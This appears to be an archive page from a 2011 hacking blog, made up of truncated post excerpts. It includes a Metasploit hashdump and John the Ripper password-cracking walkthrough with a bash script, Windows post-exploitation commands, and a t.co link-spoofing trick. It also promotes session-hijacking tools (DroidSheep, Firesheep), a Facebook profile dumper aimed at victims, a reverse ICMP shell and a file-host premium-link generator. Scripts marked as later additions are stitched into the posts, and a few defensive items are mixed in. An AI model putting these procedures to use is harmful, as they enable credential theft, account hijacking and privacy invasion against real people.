Friday 30 September 2011

Howto: Windows Post Exploitation With John The Ripper In Metasploit 4 Or Ophcrack

This post shows how to recover the passwords once you have a foothold on the victim machine.

1. Exploit the victim with Metasploit.

2. After you get a meterpreter shell, run post/windows/gather/hashdump to dump the password hashes.

  - meterpreter > run post/windows/gather/hashdump

3. Grab the list and send the meterpreter session to the background.
  - meterpreter > background

4. Use the John the Ripper module.
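As an added example (not part of the original post, which uses the John the Ripper module inside Metasploit), the script below does the same job with the standalone john binary: it filters the pwdump-style lines that hashdump prints, drops accounts with an empty NT password, and picks --format=lm or --format=nt depending on whether the dump actually contains LM hashes. The hashdump lines are constructed sample data and the wordlist path is an assumption.

```bash
#!/usr/bin/env bash
# Added example, not the original post's procedure: prepare hashdump output
# for a standalone john run. Sample dump below is constructed.
set -eu

# Constructed hashdump output (user:rid:LM:NT:::). aad3b435... is the hash of
# an empty LM password, i.e. LM storage is disabled for that account, and
# 31d6cfe0... is the NT hash of an empty password.
SAMPLE_DUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::'

EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT="31d6cfe0d16ae931b73c59d7e0c089c0"

# Keep only well-formed pwdump lines (meterpreter status lines such as
# "[*] Obtaining ..." are dropped) and skip accounts whose NT hash is the
# empty-password hash, since there is nothing to crack there.
extract_hashes() {
  awk -F: -v empty_nt="$EMPTY_NT" '
    NF >= 4 && length($3) == 32 && $3 ~ /^[0-9a-fA-F]+$/ &&
    length($4) == 32 && $4 ~ /^[0-9a-fA-F]+$/ && $4 != empty_nt {
      print $1 ":" $2 ":" $3 ":" $4 ":::"
    }'
}

# Decide which John format to run first. LM hashes are case-insensitive and
# split into two 7-character halves, so they fall quickly; crack them when
# present, otherwise go straight for NT.
choose_format() {
  awk -F: -v empty_lm="$EMPTY_LM" '
    NF >= 4 && length($3) == 32 && $3 != empty_lm { found = 1 }
    END { print (found ? "lm" : "nt") }'
}

# Write the hash file and print the john command line (assumed wordlist path).
main() {
  local out="${1:-$(mktemp)}" wordlist="${2:-/usr/share/wordlists/rockyou.txt}"
  local fmt
  printf '%s\n' "$SAMPLE_DUMP" | extract_hashes > "$out"
  fmt=$(printf '%s\n' "$SAMPLE_DUMP" | choose_format)
  echo "wrote $(wc -l < "$out" | tr -d ' ') hash line(s) to $out"
  echo "run: john --format=$fmt --wordlist=$wordlist $out"
  echo "then: john --format=$fmt --show $out"
}

# Run only when invoked as: ./hashdump_to_john.sh --run [outfile] [wordlist]
if [ "${1:-}" = "--run" ]; then
  shift
  main "$@"
fi
```

If you crack LM first, feed the recovered (upper-case) LM passwords back as a wordlist with john's case-toggling rules to recover the case-sensitive NT password quickly.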

Thursday 29 September 2011

Add Backtrack Tools Into Ubuntu 11.04

1. Add the GPG key for the new repository
wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

2. Add the Backtrack 5 repositories to the list
   - sudo vim /etc/apt/sources.list
   deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
   deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
   deb http://

Decoding Mysql Char() to Ascii With Shell Script

When doing forensics on website logs, I found that many attacks use MySQL's CHAR() to evade detection or to make the malicious code hard to spot. So I wrote this simple script to decode every CHAR() in a log file into ASCII characters for human reading.

./decoding_char_sql.sh logfiles.log

Example logfiles.log:

target.com/testing.php?vulnparam=1000'+update+tablenames+set+value=cast(value+as+varchar(
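An added example of such a decoder, written for this page and not the original decoding_char_sql.sh: it rewrites every standalone CHAR(...) call on each log line into the string it builds, accepting decimal or 0x-hex arguments separated by commas, spaces or URL-encoded "+" signs, and leaves calls it cannot decode (and names such as "varchar(10)") untouched. The log lines in the test are constructed.

```bash
#!/usr/bin/env bash
# Added example, not the original post's script: decode MySQL CHAR(...) calls
# in log lines to readable text. Usage: ./decode_char.sh logfile.log
set -eu
export LC_ALL=C  # keep awk's %c to a single byte for codes above 127

decode_char() {
  awk '
  # Turn an argument list like "104,+101, 0x6c" into the characters it encodes.
  # Returns "" if any argument is not a number, so the caller keeps the call as is.
  function decode_args(args,   n, parts, i, v, out) {
    gsub(/[+ ]/, "", args)            # drop spaces and URL-encoded spaces
    n = split(args, parts, ",")
    out = ""
    for (i = 1; i <= n; i++) {
      v = parts[i]
      if (v ~ /^0[xX][0-9a-fA-F]+$/) v = hex(substr(v, 3))
      if (v !~ /^[0-9]+$/) return ""
      out = out sprintf("%c", v + 0)
    }
    return out
  }
  # Parse a hex digit string to a number (plain awk has no strtonum).
  function hex(s,   i, r) {
    r = 0
    for (i = 1; i <= length(s); i++)
      r = r * 16 + index("0123456789abcdef", tolower(substr(s, i, 1))) - 1
    return r
  }
  {
    line = $0; out = ""
    # Scan left to right for CHAR( ... ) and replace each call in turn.
    while (match(line, /[cC][hH][aA][rR]\([0-9a-fA-FxX, +]*\)/)) {
      pre  = substr(line, 1, RSTART - 1)
      call = substr(line, RSTART, RLENGTH)
      rest = substr(line, RSTART + RLENGTH)
      dec  = ""
      # Only decode a standalone CHAR(); "varchar(10)" must stay untouched.
      if (pre !~ /[A-Za-z0-9_]$/)
        dec = decode_args(substr(call, 6, RLENGTH - 6))
      out  = out pre (dec == "" ? call : dec)
      line = rest
    }
    print out line
  }'
}

# Decode the file given on the command line, if any.
if [ -n "${1:-}" ] && [ -f "$1" ]; then
  decode_char < "$1"
fi
```

Decoded output can contain newlines, quotes or other control characters chosen by the attacker, so pipe it into a pager or cat -v rather than straight into a terminal, and keep the original log for evidence.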

Tuesday 27 September 2011

ICMP Shell

icmpsh - simple reverse ICMP shell

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python.


--- Running the Master ---

The master is straightforward to use. The C version needs no extra libraries.
The Perl master, however, has the following dependencies:

* IO::Socket
* NetPacket::IP
* NetPacket::ICMP


When running the

iScanner - Tool to detect and remove malicious code from web pages

iScanner is a free open-source tool that lets you detect and remove malicious code and web-page malware from your website easily and automatically. iScanner not only shows you the infected files on your server, it can also clean them by removing ONLY the malware code from the infected files. Download: http://iscanner.isecur1ty.org/download/iscanner.tar.gz
 Current Features:

JavaScript Deobfuscation Tricks And Tools

Tricks
     Normal tricks:
      1. Assign the result of eval to a variable and write it out
        From: eval(code…);
        To: var x = eval(code…); document.write(x);

      2. Replace document.write() with alert()
        From: document.write(code…);
        To: alert(code…);

      3. Replace eval() with document.write()
        From: eval(code…);
        To: document.write(code…);

      4. Wrap code with alert()

Sunday 25 September 2011

Howto: Metasploit Post Exploitation With Inject CA

1. Create the certificate with the impersonation-ssl module;
 you can download the module from http://blog.c22.cc/2011/09/04/ssl-certificate-impersonation-for-shits-and-giggles/


2. Create a phishing site that uses the fake SSL certificate.

3. Get the injection module from https://dev.metasploit.com/redmine/issues/5503


4. Go to Metasploit and exploit the victim.


5. When you get the meterpreter shell, use

Saturday 24 September 2011

Twitter's t.co URL spoofing.

If you want the details, please go to the Source.

So after I read the Source, I tried to spoof it myself with:

Normal Link:
http://t.co/ZSUXSER6

Target Link:
http://t.co/B4odJfzY

Spoofed Link:
http://t.co/ZSUXSER6:../../../../B4odJfzY

Now when I browse with spoofed link, I will go to target link.

Source: http://blog.12k.nl/post/10604842941/twitters-t-co-url-spoofing

Howto: Commands For Information Gathering In Windows Post Exploitation

If you want to see all the commands and the output of each one, please go to the Source.

Gather system information:
C:\>systeminfo

Running services (with the process hosting each one):
C:\>tasklist /svc

Installed services, in every state (the space after "state=" is required):
C:\>sc query state= all

Current environment variables:
C:\>set

Find the username:
C:\>set | find "USERNAME"

Find the domain:
C:\>set | find "USERDOMAIN"

Find current user information (local accounts on the host):
C:\>net user

Friday 23 September 2011

simple-shellcode-generator.py By Didier Stevens

To generate this shellcode with simple-shellcode-generator.py, create a text file (call it createfile.def) with these 2 lines:
kernel32.dll CreateFileA str 0x0 0x0 0x0 0x2 0x80 0x0
kernel32.dll CloseHandle eax

Each line in this definition file instructs the generator to generate assembler code to lookup the address of the WIN32 API function, and to call it with the arguments you provide.

How to undo send in Gmail

1. Go to Google Labs and then Gmail Labs, or
 click on the green flask in your Gmail, as in the image, to go directly to Gmail Labs.

2. Then scroll down the page to the "Undo Send" feature.
3. Enable the feature. Once it is enabled for your Gmail account, you will get an "Undo" option right after sending any email.

Source: http://tricksndtricks.blogspot.com/2011/03/

Thursday 22 September 2011

Exploiting Microsoft IIS version 6.0 WebDAV with Metasploit (exploit)


BACKGROUND

According to technet.microsoft.com, Web Distributed Authoring and Versioning (WebDAV) extends the HTTP/1.1 protocol to allow clients to publish, lock, and manage resources on the Web.

Integrated into IIS, WebDAV allows clients to do the following:

• Manipulate resources in a WebDAV publishing directory on your server. For example, users who have been assigned the correct

WordPress <= 3.1.2 Clickjacking Vulnerability Advisory

                  ( . )
`) (
. ' . ' `.
( , ) (,
. `.' ) ('. ',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/
(x.0)

Wednesday 21 September 2011

Metasploit Spoofing Log Messages.

Description

These modules were developed to aid in testing log management, SIEM, and correlation engines that process syslog messages. These modules can also be used to generate mocked up scenarios to test incident response processes, teams and SOC analysts without having to perform real attacks on critical resources or other systems.

syslog_spoof_custom_message.rb - Basically allows you
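An added example, not one of the Metasploit modules the post describes: a small shell script that builds RFC 3164 (BSD) syslog lines with a spoofed hostname and program tag and ships them to a collector over UDP 514, so a brute-force correlation rule can be exercised without touching the real host. The hostnames and addresses are made up, and sending assumes nc is installed.

```bash
#!/usr/bin/env bash
# Added example, not the original post's module: spoof RFC 3164 syslog lines.
set -eu

# PRI = facility * 8 + severity (RFC 3164 section 4.1.1).
# Facilities: kern=0 user=1 auth=4 authpriv=10 local0=16 ... local7=23
# Severities: emerg=0 alert=1 crit=2 err=3 warning=4 notice=5 info=6 debug=7
syslog_pri() {
  echo $(( $1 * 8 + $2 ))
}

# syslog_line FACILITY SEVERITY TIMESTAMP HOSTNAME TAG MESSAGE
# TIMESTAMP is passed in (BSD form, e.g. "Sep 21 10:15:03") so output is
# reproducible; the collector fills in the source address itself, which is why
# the hostname field is the part an attacker (or a tester) can freely spoof.
syslog_line() {
  printf '<%d>%s %s %s: %s' "$(syslog_pri "$1" "$2")" "$3" "$4" "$5" "$6"
}

# Current time in BSD syslog form. %e pads the day with a space ("Sep  1"),
# which is what RFC 3164 specifies; %d would give "Sep 01" and may not parse.
bsd_timestamp() { date '+%b %e %H:%M:%S'; }

# Constructed scenario: a burst of failed root logins "from" a fake source,
# the sequence a password-guessing correlation rule should fire on.
# failed_login_burst SPOOFED_HOST SOURCE_IP COUNT
failed_login_burst() {
  local host="$1" src="$2" count="$3" i
  for i in $(seq 1 "$count"); do
    syslog_line 10 5 "$(bsd_timestamp)" "$host" "sshd[$((4000 + i))]" \
      "Failed password for root from $src port $((40000 + i)) ssh2"
    echo
  done
}

# Send lines from stdin to the collector with nc (-u UDP, -w1 one-second timeout).
send_udp() {
  local collector="$1" port="${2:-514}" line
  while IFS= read -r line; do
    printf '%s' "$line" | nc -u -w1 "$collector" "$port"
  done
}

# Example run (all values made up):
#   failed_login_burst dc01.corp.example 192.0.2.45 8 | send_udp 10.0.0.20
```

Because plain UDP syslog carries no authentication, the collector cannot tell this burst from a real one; that is exactly what makes it useful for testing a SIEM, and exactly why log sources should be verified against the sending IP or moved to TLS-authenticated transport in production.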

Monday 19 September 2011

Cracking OS X Lion Passwords

When it comes to Lion, the general premise is the same (albeit a few technical differences). Each user has their own shadow file, with each shadow file stored under a .plist file located in /var/db/dslocal/nodes/Default/users/.

The interesting thing when it comes to Lion's implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar

Sunday 18 September 2011

DroidSheep. [ Session Hijacking Tool On Android]

What is this about?
If you know Firesheep or FaceNiff, you probably already know what this is about: one-click session hijacking using your Android smartphone or tablet.
If you do not know either of these tools, I'll try to explain what DroidSheep is.
Maybe you know Bob. Bob is a well-known person and Bob loves coffee. Every morning, he takes his laptop and visits one of the famous green

PoC: Hacking Facebook with HTML5 By @skeptic_fx

Facebook Graph API Access Token Stealing: Long Live UI Redressing. A week after my first Facebook bounty, I found another place where Facebook made the same mistake of not busting IFrames. And guess what, it's another whole domain: developers.facebook.com. It includes all the documentation and examples for using the Facebook Graph API and other products like the Legacy REST API, FQL,

Friday 16 September 2011

Droidsheep : Android Application for Session Hijacking


DroidSheep is a free alternative to FaceNiff, available for free from the DroidSheep website. It is a one-click hijacking tool which supports:
amazon.de
facebook.com
flickr.com
twitter.com
linkedin.com
yahoo.com
live.com
google.de (only the non-encrypted services like "maps")
What do you need to run DroidSheep?
You need an Android-powered device running at least Android 2.1

Thursday 15 September 2011

List of Rogue Certificates That Were Created In The DigiNotar Incident.

After the DigiNotar CA was compromised, the attackers issued many rogue certificates usable for man-in-the-middle attacks, phishing websites, or whatever else they wanted.


This post links to the list of rogue certificates that were created in this incident.

If you ever added any of these certificates (or the DigiNotar root) to a trust store, remove it.

Download Link: https://svn.torproject.org/svn/projects/misc/diginotar/rogue-certs-2011-09-04.csv




iPhone secret codes | iPhone tricks


The list of secret codes is given below


Code      Action
*#06#     Display the IMEI number of the phone
*225#     Display the balance details of a postpaid number
*#43#     Check whether call waiting is enabled
*#61#     Verify the number for

Link For Download Slide And White Paper From DefCon19

DEF CON is one of the oldest continuously running hacker conventions around, and also one of the largest.

The slides from DEF CON 19 are now ready for download.

Download Link:  https://www.defcon.org/html/links/dc-archives/dc-19-archive.html


FileServe, Filesonic and Wupload premium link generator

FileServe, Filesonic and Wupload are some famous file hosting websites, and you need a premium account for unlimited and fast downloads. Today I have an online tool which generates premium links for these three file hosting websites. I have already posted some other tools and online services for hacking and getting premium links for file hosting services. This is a new one which I found online.


Go

Monday 12 September 2011

Multiple Dictionaries or Wordlists Using John the Ripper

If you want the details, please go to the Source.

John the Ripper only takes one wordlist at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John's stdin mode, but I like to run rules against my lists and I didn't see any how-tos on doing this. Here is my way:

ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist

Sunday 11 September 2011

Post-Exploitation Without A TTY


Post-exploitation activities during a pentest may involve using “su” to try and log into other local accounts, or using “ssh” to log into other hosts.
Using “Expect” To Get A TTY If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.

$ cat sh.exp
#!/usr/bin/expect
# Spawn a

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it's not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port. This page deals with the former.
Your

Post Exploitation Command Lists

This post is a very interesting article from room362, so please go to the Source.

I've had a private list of commands that I run on Windows or Linux when I pop a shell, as I'm sure most pentesters do. It isn't so much a thing of hoarding as much it is just jumbled notes that are 'not worth posting'
Well, I made two (now 3) public google docs (anyone can edit) *don't be a dick clause
Linux/

Firesheep Extended!

"Firesheep is a Firefox extension that demonstrates HTTP session hijacking attacks. You can hijack private accounts on Facebook, Twitter, and other websites that employ weak HTTP protection strategies."
Changes in Firesheep Extended:
This version, which has been modified by Alcatel-Lucent Bell Labs, focuses on some Web applications like Google Search that only verify the (unsecured) user's session

Friday 9 September 2011

URGE [Hacking Twitter Tool By Anonymous]

We recently have become tired of seeing trending topics on twitter that were redundant and “pop culture” like.  We have also grown tired of Twitter not trending hash tags that actually serve a cause and mean something to free thinkers of the world.  We have taken note of why Twitter would not do so, they only trend topics which would “appeal” to people and can get people to tweet more.  

fbpwn [A cross-platform Java based Facebook profile dumper]

A cross-platform Java based Facebook profile dumper: it sends friend requests to a list of Facebook profiles and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information, photos and friend list to a local folder.
Usage
A typical scenario is to gather the information from a user profile. The plugins are just a series of normal operations on FB

Friday 2 September 2011